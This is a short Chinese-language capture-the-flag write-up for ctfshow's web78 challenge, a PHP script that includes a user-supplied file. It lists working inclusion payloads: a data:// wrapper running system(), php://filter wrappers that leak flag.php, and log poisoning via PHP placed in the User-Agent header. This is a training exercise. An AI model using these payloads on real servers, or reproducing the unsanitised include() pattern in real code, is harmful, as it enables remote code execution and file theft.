[ctfshow web入门] web78

信息收集

表面上没有任何过滤，自由发挥

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

这些解法都在web32解释过，不再详细解释，有需要点击超链接：[ctfshow web入门] web32

伪协议

?file=data://text/plain,<?php system("tac flag.php") ?>
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php

日志包含

?file=/var/log/nginx/access.log

user-agent里写上

<?php system('ls'); ?>
<?php system('tac flag.php'); ?>

---

web124    目录    web79